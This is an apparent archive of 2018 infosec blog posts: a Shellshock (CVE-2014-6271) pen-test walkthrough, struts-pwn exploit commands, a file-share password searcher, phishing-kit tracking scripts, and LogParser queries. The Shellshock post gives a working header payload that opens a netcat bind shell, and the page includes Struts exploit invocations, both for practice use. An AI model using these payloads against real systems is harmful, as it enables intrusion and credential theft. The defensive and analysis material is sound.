Sunday, December 23, 2018
CVE-2014-6271 walk through
when practicing pen testing on CVE-2014-6271
Burp Suite proxy, repeater, modify user agent
GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
the repeater will not return because it's now waiting for a connection
open another prompt and launch netcat to connect to port 9999
nc xxx.xxx.xxx.xxx 9999
you are now at the /bin/sh prompt of the compromised system, so you can type a command like
"whoami"
Labels: burp suite, cve, cve-2014-6271, netcat, Shellshock
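On the defensive side of the same CVE, as an added example that is not part of the post: a small parser for combined-format web access logs that flags requests whose User-Agent or Referer header opens a bash function definition ("() {"), the one thing every Shellshock attempt shares whatever command follows it. The log lines are constructed samples, not real traffic.

```python
import re
from collections import Counter

# Every Shellshock (CVE-2014-6271) request smuggles a bash function definition,
# "() {", into a header that a CGI script will export as an environment variable.
# Matching on that prefix catches the attempt regardless of the command behind it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def find_shellshock_attempts(log_lines):
    """Return one dict per access-log line whose User-Agent or Referer carries the
    "() {" prefix. The status code is kept because a 200 against a CGI path needs
    a closer look than a 404."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would log the parse failure
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "request": m.group("req"),
                             "status": int(m.group("status")), "field": field, "value": m.group(field)})
                break
    return hits

def top_sources(hits):
    """Source IPs ordered by number of attempts, for blocking or further triage."""
    return Counter(h["ip"] for h in hits).most_common()

# Constructed sample lines, not real traffic: one normal request, one attempt in the
# User-Agent, one in the Referer, and one decoy "()" without a brace that must not match.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Dec/2018:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [23/Dec/2018:10:01:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; echo vulnerable"',
    '10.0.0.9 - - [23/Dec/2018:10:01:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "() { :; }; echo shellshock-test" "curl/7.58.0"',
    '10.0.0.7 - - [23/Dec/2018:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; () bot)"',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print("SHELLSHOCK ATTEMPT from {ip} at {ts}: {request} -> {status} [{field}: {value}]".format(**hit))
    print(top_sources(find_shellshock_attempts(SAMPLE_LOG)))
```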
CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
I found this github page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
https://github.com/mazen160/struts-pwn_CVE-2017-9805
Check if the vulnerability exists against a single URL.
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
Exploit a single URL.
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
kali metasploit website auxiliary modules
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
list all nmap scripts available
to see all the nmap scripts available you can list out this directory
ls /usr/share/nmap/scripts/
vmware tools kali linux vmplayer
if you have Kali Linux and VMware Tools isn't working in VMware Player, follow these instructions
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
dirbuster wordlist folder location
If you need a wordlist of directories for the dirbuster tool, on a default Kali install they are located here
/usr/share/wordlists/dirbuster/
Saturday, December 22, 2018
apt-get update fails on Kali KEYEXPIRED
if
apt-get update
fails on Kali with an error like this
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Err:1 http://kali.download/kali kali-rolling InRelease
The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
Fetched 30.5 kB in 8s (3,483 B/s)
Reading package lists... Done
W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Some index files failed to download. They have been ignored, or old ones used instead.
The fix appears to be these two commands, which fetch and install the new archive keyring
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
Thursday, December 20, 2018
Qradar API basics
This is where you can find the API documentation for your QRadar instance
https://<your qradar url>/api_doc
this lists all the API calls available
you can make calls directly in the browser, if your credentials have permission, by going to a URL such as
https://<your qradar url>/api/siem/offenses
this older blog post gives more details about connecting for the first time
https://neonprimetime.blogspot.com/2016/01/qradar-siem-api-101-walk-through.html
py2exe does not work on python 3.6, use pyinstaller instead
py2exe does not work on python 3.6
use pyinstaller instead
py2exe throws this error
"IndexError: tuple index out of range"
so instead I get pyinstaller by doing this
> pip install pyinstaller
and then running
> pyinstaller.exe --onefile myscript.py
and it generates a working EXE
openFileShareWalker.py
# open file share searcher for passwords or restricted documents
import argparse
import os
import re

# definitions
suspiciousFileNames = r'(?i)(\.config|\.txt|\.ini|\.pdf|\.doc|\.xls|\.java|\.sql|\.vbs|\.inf|pwd|password)'
passwordSearchableFileNames = r'(?i)(\.config|\.txt|\.ini|\.java|\.sql|\.vbs|\.inf)'
passwordKeywords = r'(?i)(pwd|password|passwd|getConnection|connectionString)'
falsePositiveFolders = r'(?i)(EPO_REPOSITORY|VSCANDAT|AdaptivaCache|SmsPkg|DriverPkg)'
falsePositiveFileNames = r'(?i)(license|avvdat|uninst)'
suspiciousFiles = []
passwordFiles = []
fileCount = 0
progressInterval = 10000
progressTracker = progressInterval

# arguments
arguments = argparse.ArgumentParser("Search Open File Shares for passwords and restricted documents")
# raw string so the UNC example survives Python's backslash escaping
arguments.add_argument("-f", "--folder", type=str, required=True, help=r"Full UNC path (\\server\share) of open file share to search (note: file:// does not work)")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-p", "--progress", action="store_true", required=False, help="Enable progress tracking")
settings = arguments.parse_args()

# processing: pass 1 walks the share and collects files whose name looks interesting
if settings.debug or settings.progress:
    print("starting walk of folder '{0}'".format(settings.folder))
for dname, dirs, files in os.walk(settings.folder):
    if settings.debug:
        print("starting walk of sub-folder '{0}'".format(dname))
    for fname in files:
        fileCount = fileCount + 1
        fpath = os.path.join(dname, fname)
        if settings.progress and fileCount >= progressTracker:
            print("PROGRESS: {0} files analyzed so far".format(str(fileCount)))
            progressTracker = progressTracker + progressInterval
        if settings.debug:
            print("analyzing file '{0}'".format(fname))
        # skip known-noisy folders (AV and patch repositories) before looking at the name
        folderBadMatch = re.search(falsePositiveFolders, fpath)
        if folderBadMatch is None:
            match = re.search(suspiciousFileNames, fname)
            if match is not None:
                fileBadMatch = re.search(falsePositiveFileNames, fname)
                if fileBadMatch is None:
                    if settings.debug:
                        print("matched file '{0}'".format(fpath))
                    suspiciousFiles.append(fpath)
        if settings.debug:
            print("finished analyzing file '{0}'".format(fname))
    if settings.debug:
        print("finished walk of sub-folder '{0}'".format(dname))
if settings.debug:
    print("finished walk of folder '{0}'".format(settings.folder))

# pass 2 greps the text-like matches for password keywords
if settings.debug or settings.progress:
    print("starting password searching")
for file in suspiciousFiles:
    isSearchable = re.search(passwordSearchableFileNames, file)
    if isSearchable is not None:
        if settings.debug:
            print("searching for passwords in '{0}'".format(file))
        try:
            # errors="ignore" so a stray binary byte in a .txt/.config does not abort the whole run
            with open(file, errors="ignore") as f:
                for line in f:
                    match = re.search(passwordKeywords, line)
                    if match is not None:
                        passwordFiles.append((file, line.rstrip("\r\n")))
        except OSError as e:
            # one unreadable file (permissions, locked) should not stop the scan
            print("could not read '{0}': {1}".format(file, e))
if settings.debug:
    print("finished password searching")

# output
for file in suspiciousFiles:
    print(file)
for (file, line) in passwordFiles:
    print("POSSIBLE PASSWORD in '{0}' [{1}]".format(file, line))
Wednesday, December 19, 2018
phishingKitTracker.py
# phishing kit parser, used to enrich kit and put into PhishingKitTracker csv format
# @neonprimetime
# https://github.com/neonprimetime/PhishingKitTracker/
import argparse
import zipfile
import urllib.request
from urllib.parse import urlparse
import os
from pathlib import Path
import re
from datetime import date
import hashlib
import shutil

# definitions
class PhishingKitTrackerEntry:
    date = date.today().strftime('%m/%d/%Y')
    reference = ""
    email = ""
    emailProvider = ""
    mailer = ""
    target = ""
    domain = ""
    zip = ""
    threatActor = ""
    md5 = ""
    url = ""

entries = []
proceed = 1
domain = ""
mailer = ""
filename = ""
md5 = ""
threatActor = ""
itemList = []
isUrls = 0
extractedfoldername = ""

# arguments
arguments = argparse.ArgumentParser("Analyze Phishing Kit, pass 1 url or file to start")
arguments.add_argument("-u", "--url", type=str, required=False, help="Url to a Phishing Kit Zip file")
arguments.add_argument("-f", "--file", type=str, required=False, help="Path to a Phishing Kit Zip file")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-r", "--reference", type=str, required=False, help="Twitter url referencing Phishing Kit")
arguments.add_argument("-l", "--listUrls", type=str, required=False, help="Path to file with a list of Urls to Phishing Kit Zip files in it 1 per line")
arguments.add_argument("-i", "--listFiles", type=str, required=False, help="Path to file with a list of Phishing Kit Zip files 1 per line")
settings = arguments.parse_args()
if settings.url is None:
    if settings.file is None:
        if settings.listUrls is None:
            if settings.listFiles is None:
                if settings.debug:
                    print("no url, file, or list param found")
                proceed = 0
                raise Exception("url (-u) or file (-f) or list (-l,-i) required")
            else:
                if settings.debug:
                    print("list of files param found '{0}'".format(settings.listFiles))
                with open(settings.listFiles) as f:
                    for line in f:
                        itemList.append(line.rstrip("\r\n"))
        else:
            if settings.debug:
                print("list of urls param found '{0}'".format(settings.listUrls))
            with open(settings.listUrls) as f:
                for line in f:
                    itemList.append(line.rstrip("\r\n"))
            isUrls = 1
    else:
        if settings.debug:
            print("file param found '{0}'".format(settings.file))
        itemList.append(settings.file)
else:
    if settings.debug:
        print("url param found '{0}'".format(settings.url))
    itemList.append(settings.url)
    isUrls = 1

# processing
if proceed == 1:
    for item in itemList:
        # reset per-kit fields so one kit's signature does not leak into the next row
        threatActor = ""
        domain = ""
        if isUrls == 0:
            filename = item
        else:
            try:
                url = urlparse(item)
                domain = url.netloc
                filename = os.path.basename(url.path)
                if settings.debug:
                    print("found domain '{0}'".format(domain))
                    print("found filename '{0}'".format(filename))
                urllib.request.urlretrieve(item, filename)
                if settings.debug:
                    print("url downloaded '{0}'".format(item))
            except Exception:
                print("failed to download '{0}'".format(item))
                continue
        extractedfoldername = str(Path(filename).with_suffix(""))
        if settings.debug:
            print("getting file hash for '{0}'".format(filename))
        with open(filename, 'rb') as file:
            md5 = hashlib.md5(file.read()).hexdigest()
        if settings.debug:
            print("unzipping file '{0}' to '{1}'".format(filename, extractedfoldername))
        # a kit is an attacker-controlled archive; extract and analyze it on an isolated box
        with zipfile.ZipFile(filename, 'r') as zip_ref:
            zip_ref.extractall(extractedfoldername)
        if settings.debug:
            print("file unzipped to '{0}'".format(extractedfoldername))
        if settings.debug:
            print("starting search for Threat Actor Signatures")
        foundActor = 0
        for dname, dirs, files in os.walk(extractedfoldername):
            if foundActor == 0:
                for fname in files:
                    fpath = os.path.join(dname, fname)
                    extension = os.path.splitext(fpath)[1]
                    if settings.debug:
                        print("found file '{0}' with extension '{1}'".format(fpath, extension))
                    if extension is not None and extension == ".php":
                        if settings.debug:
                            print("searching file '{0}'".format(fpath))
                        # errors="ignore": kit sources are often not valid UTF-8
                        with open(fpath, errors="ignore") as f:
                            line = f.read()
                        match = re.search(r'(?i)(created by|hacked by|coded by|edited by|signed by|made by)([^\r\n\=\+\"\'\,]+)\s+([\,\=\+\"\']|\-\-)', line)
                        if match is not None:
                            threatActor = match.group(1) + match.group(2)
                            foundActor = 1
                            break
        if settings.debug:
            print("finished search for Threat Actor Signatures")
        if settings.debug:
            print("starting search for Threat Actor Emails")
        for dname, dirs, files in os.walk(extractedfoldername):
            for fname in files:
                fpath = os.path.join(dname, fname)
                mailer = os.path.basename(fpath)
                extension = os.path.splitext(fpath)[1]
                if settings.debug:
                    print("found file '{0}' with extension '{1}'".format(fpath, extension))
                if extension is not None and extension == ".php":
                    if settings.debug:
                        print("searching file '{0}'".format(fpath))
                    with open(fpath, errors="ignore") as f:
                        line = f.read()
                    matches = re.findall(r'[\w\.-]+@[\w\.-]+', line)
                    for match in matches:
                        if settings.debug:
                            print("found threat actor email '{0}'".format(match))
                        entry = PhishingKitTrackerEntry()
                        if settings.reference is not None:
                            entry.reference = settings.reference
                        entry.email = match
                        entry.emailProvider = match.split('@')[1].split('.')[0]
                        entry.mailer = mailer
                        entry.domain = domain
                        entry.zip = filename
                        entry.threatActor = threatActor
                        entry.md5 = md5
                        if isUrls == 1:
                            entry.url = item
                        entries.append(entry)
        if settings.debug:
            print("deleting zip '{0}'".format(filename))
        if filename is not None and filename != "" and ".zip" in filename:
            os.remove(filename)
        if settings.debug:
            print("deleting folder '{0}'".format(extractedfoldername))
        if extractedfoldername is not None and extractedfoldername != "":
            shutil.rmtree(extractedfoldername, ignore_errors=True)
        if settings.debug:
            print("finished search for Threat Actor Emails")
else:
    if settings.debug:
        print("exiting program, proceed={0}".format(str(proceed)))

# output
for entry in entries:
    print("{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}".format(entry.date, entry.reference, entry.email, entry.emailProvider, entry.mailer, entry.target, entry.domain, entry.zip, entry.threatActor, entry.md5, entry.url))
Labels: Phishing, Phishing Kit, PhishingKitTracker, Python
Wednesday, December 12, 2018
regex extract zip, php, email from grep of phishingkit
after using this grep
https://neonprimetime.blogspot.com/2018/12/grep-recursively-phishing-kit-zip-for.html
in notepad++ you can regex out the zip name, php file name, and email address
replace this
\r\n([^\\]+)\\[^\r]+\\([^\\]+\.php)\:[^\r]+(\"|\')([^\"\'\r]+)(\"|\')[^\r]*
with this
\r\n\1,\2,\4
Monday, December 3, 2018
findstr recursively phishing kit zip for email
after unzipping
findstr /S "@" *.php | findstr "$" | findstr "=" | findstr ";" | findstr "." | findstr /I /V "From" | findstr /I /V "headers" |findstr /I /V "function" | findstr /I /V "key" | findstr /I /V "indexOf" | findstr /I /V "class" | findstr /I /V "isset" | findstr /I /V "@date" | findstr /I /V "server" | findstr /I /V "http" | findstr /I /V "css" | findstr /I /V "style" | findstr /I /V "?" | findstr /I /V "@eval"
Saturday, December 1, 2018
grep recursively phishing kit zip for email
find email
// $send = "bad@bad.com";
grep -r -P '\=\s*.([a-zA-Z][\w\_\.]{5,20})\@([a-zA-Z0-9.-]+)\.([a-zA-Z]{2,4})' | grep -v -P '(?i)(from|headers|array|message|find|domain)'
// mail("bad@bad.com", ...)
grep -r -P 'mail\([^\r\n]+\@'
find who created it
// ------ HACKED BY Somebody ----------
grep -r -P "(?i)(Created By|Hacked by|Coded by|Edited By|Signed by|Made by)" * | grep -v function
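Putting the two phishing-kit posts above together (the findstr/grep hits for quoted addresses, and the Notepad++ regex that turns each hit into a zip,php,email row), as an added example that is not from the blog: the same extraction as a script, so the rows can be produced without the editor step. The hit lines are constructed samples with placeholder addresses.

```python
import re

# One findstr/grep hit is "<kit folder>\<sub dirs>\<file>.php:<matched line>" (grep
# prints forward slashes). The kit folder is the first path component, i.e. the zip
# name after unzipping each kit into a folder of the same name, and the php file is
# the last one; the email is the first quoted address on the matched line, which is
# what the Notepad++ capture groups 1, 2 and 4 pick out.
HIT_RE = re.compile(r'^(?P<kit>[^\\/]+)[\\/](?:[^:]*[\\/])?(?P<php>[^\\/:]+\.php):(?P<rest>.*)$')
QUOTED_EMAIL_RE = re.compile(r'["\']\s*([\w.+-]+@[\w.-]+\.[A-Za-z]{2,})\s*["\']')

def parse_hit(line):
    """Return (kit, php, email) for a hit line, or None when the line is not a php
    hit or the address is not a bare quoted string (e.g. a From: header value)."""
    m = HIT_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    e = QUOTED_EMAIL_RE.search(m.group("rest"))
    return (m.group("kit"), m.group("php"), e.group(1)) if e else None

def hits_to_csv_rows(lines):
    """One kit,php,email row per unique hit, as the Notepad++ replacement produces."""
    rows, seen = [], set()
    for line in lines:
        parsed = parse_hit(line)
        if parsed and parsed not in seen:
            seen.add(parsed)
            rows.append(",".join(parsed))
    return rows

# Constructed sample hits (not from a real kit); the example.* addresses are placeholders.
SAMPLE_HITS = [
    r'abc\inc\send.php:$send = "dropbox1@example.com";',
    r"bob\login\post.php:$recipient = 'dropbox2@example.net';",
    r'abc\inc\send.php:$send = "dropbox1@example.com";',                # duplicate hit, collapsed
    r'test/mail/x.php:mail("dropbox3@example.com", $subject);',          # grep-style path
    r'test\index.php:$headers = "From: Office <noreply@example.org>";',  # not a drop address
    r'abc\readme.txt:contact@example.com',                               # not a php file
]

if __name__ == "__main__":
    for row in hits_to_csv_rows(SAMPLE_HITS):
        print(row)
```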
unzip all files to folder with same name
unzip files to a folder with the same name
>ls
abc.zip
bob.zip
test.zip
>find . -name "*.zip" | while read -r filename; do unzip -o -d "$(basename -s .zip "$filename")" "$filename"; done
>ls
abc
abc.zip
bob
bob.zip
test
test.zip
wget -i Urls.txt
download a list of #phishingkit zips
put the urls into urls.txt, one per line
run command
wget -i urls.txt
Friday, November 30, 2018
PhishingKitTracker by neonprimetime
#infosec community
I've recorded the #threatactoremail from each #phishingkit for the last year & started tracking them out on @GitHub to share with you. My hope is this can somehow be used to fight the onslaught of #phishing seen daily
See the list
https://github.com/neonprimetime/PhishingKitTracker/blob/master/PhishingKitTracker.csv
I have 500 phishing kits so far and the data paints some interesting pictures. Such as 82% of the phishing kits I tracked use a @Gmail account to receive the stolen creds. I've also found threat actors that re-use so you can perhaps link together campaigns.
A big thank you, all the credit for the data goes to the #infosec community on twitter that hunts and finds all the evil #phishing sites such as @TechHelpListCom @IpNigh @ANeilan @leunammejii @ActorExpose @n0p1shing @dave_daves @FewAtoms @nullcookies @PhishingAi @jcybersec_ @JonSelman @MaelSecurity @demonslay335 @dms1899 @malware_traffic @olihough86 @packet_Wire @ps66uk @Ring0x0 @sS55752750 @teoseller @tiketiketikeke @ViriBack @WifiRumHam @PhishTank_Bot and everyone else in the community
If anybody knows people at @Gmail, @Yandex, @Yahoo, @Zoho, @ProtonMail that care about this type of data and could perhaps help the #infosec community start streamlining reporting or detection of these email accounts that receive stolen creds daily, that'd be sweet.
If anybody knows a better place to upload zipped up phishing kits than VT, I'd love to be sharing and archiving them somewhere the whole community has access to.
If anybody ever has #phishing threat actor emails they want appended to this list, just CC me and I'll do my best to get them added
If anybody has suggestions on better ways to do this & share w/ the community, extra data/fields to track, etc. I'm all open ears, for example if somebody wanted to build a tracker website for the community to use you'd be my hero! Otherwise, HAPPY FRIDAY
Labels: Github, Phishing, Phishing Kit, PhishingKitTracker, threatactoremail
Wednesday, November 28, 2018
LogParser basic syntax
LogParser.exe -i:EVT -h [prints the columns available on that event log type]
# Windows Auth (Security)
select where LogonType <> '3'
LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings, 8, '|') as LogonType,EXTRACT_TOKEN(Strings, 17, '|') AS ProcessName,EXTRACT_TOKEN(Strings, 18, '|') AS SourceIP FROM logs.evtx where EventID=4624 and EXTRACT_TOKEN(Strings, 8, '|') <> '3'"
# Windows Task Scheduler
LogParser.exe -i:EVT "SELECT EXTRACT_TOKEN(Strings, 0, '|') as TaskName, EXTRACT_TOKEN(Strings, 1, '|') as Path, EXTRACT_TOKEN(Strings, 2, '|') as ProcessId, EXTRACT_TOKEN(Strings, 3, '|') AS Priority FROM Microsoft-Windows-TaskScheduler%4Operational.evtx where EventID = 129 and EXTRACT_TOKEN(Strings, 1, '|') not like '%Sophos%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%GoogleUpdate%' and EXTRACT_TOKEN(Strings, 0, '|') not like '%Database One%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%Small Business%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%Solutions BPA%'"
LogParser.exe -i:EVT "select * from security.evtx" -rtp:-1
LogParser.exe -i:EVT "select * from security.evtx_ where eventid=4703" -rtp:-1
LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc" -rtp:-1
LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc" -rtp:-1 -o:csv > out.csv
LogParser.exe -i:EVT "select timegenerated from system.evtx_ where message not like '%description for%' AND timegenerated >= '2018-11-26 05:00:00' and timegenerated <= '2018-11-26 18:00:00'" -rtp:-1
LogParser.exe -i:EVT "select timegenerated, strings from security.evtx_ where strings not like '%privilege%'" -rtp:-1 -o:csv > out.csv
NOTE:
The -rtp:-1 parameter suppresses the "press a key" paging feature that LogParser uses by default
NOTE:
If you get "The description for event id ... cannot be found" for every message, it might be because the user account needs the "Manage auditing and security log" permission
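The same two queries (4624 logons that are not LogonType 3, and the count-per-EventID summary) worked through in Python over constructed records, as an added example that is not from the post or from LogParser: it shows what EXTRACT_TOKEN is doing with the '|'-joined Strings column and why indices 5, 8, 17 and 18 are the ones pulled for 4624. The records and the make_4624 helper are constructed for the example.

```python
from collections import Counter

# Constructed records in the shape LogParser's EVT input presents them (not real
# logs): EventID, TimeGenerated and the Strings column, which is the event's
# insertion strings joined with '|'. For 4624 the query pulls tokens
# 5 (TargetUserName), 8 (LogonType), 17 (ProcessName) and 18 (IpAddress).
def make_4624(time_generated, user, logon_type, process, ip):
    tokens = [""] * 20
    tokens[5] = user
    tokens[6] = "CORP"
    tokens[8] = logon_type
    tokens[17] = process
    tokens[18] = ip
    return {"EventID": 4624, "TimeGenerated": time_generated, "Strings": "|".join(tokens)}

SAMPLE_RECORDS = [
    make_4624("2018-11-26 05:12:01", "alice", "2", r"C:\Windows\System32\winlogon.exe", "127.0.0.1"),
    make_4624("2018-11-26 05:30:44", "svc_backup", "3", "-", "10.1.2.3"),
    make_4624("2018-11-26 06:02:10", "bob", "10", r"C:\Windows\System32\winlogon.exe", "10.1.9.8"),
    {"EventID": 4634, "TimeGenerated": "2018-11-26 06:03:00", "Strings": "S-1-5-21|bob|CORP|0x1234|10"},
]

def extract_token(strings, index, sep="|"):
    """Mirror of EXTRACT_TOKEN(Strings, index, sep): the index-th field, or None
    (LogParser's NULL) when the record has fewer fields than that."""
    parts = strings.split(sep)
    return parts[index] if 0 <= index < len(parts) else None

def non_network_logons(records):
    """The first query in the post: 4624 events whose LogonType is not 3
    (network logon), projected to the same five output columns."""
    rows = []
    for r in records:
        if r["EventID"] != 4624 or extract_token(r["Strings"], 8) == "3":
            continue
        rows.append({
            "LoginTime": r["TimeGenerated"],
            "username": extract_token(r["Strings"], 5),
            "LogonType": extract_token(r["Strings"], 8),
            "ProcessName": extract_token(r["Strings"], 17),
            "SourceIP": extract_token(r["Strings"], 18),
        })
    return rows

def count_by_event_id(records):
    """The 'select eventid, count(*) ... group by eventid order by count(*) desc' query."""
    return Counter(r["EventID"] for r in records).most_common()

if __name__ == "__main__":
    for row in non_network_logons(SAMPLE_RECORDS):
        print(row)
    print(count_by_event_id(SAMPLE_RECORDS))
```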
Sunday, November 25, 2018
#phishingkit 10/2017 to 11/26/2018 from Twitter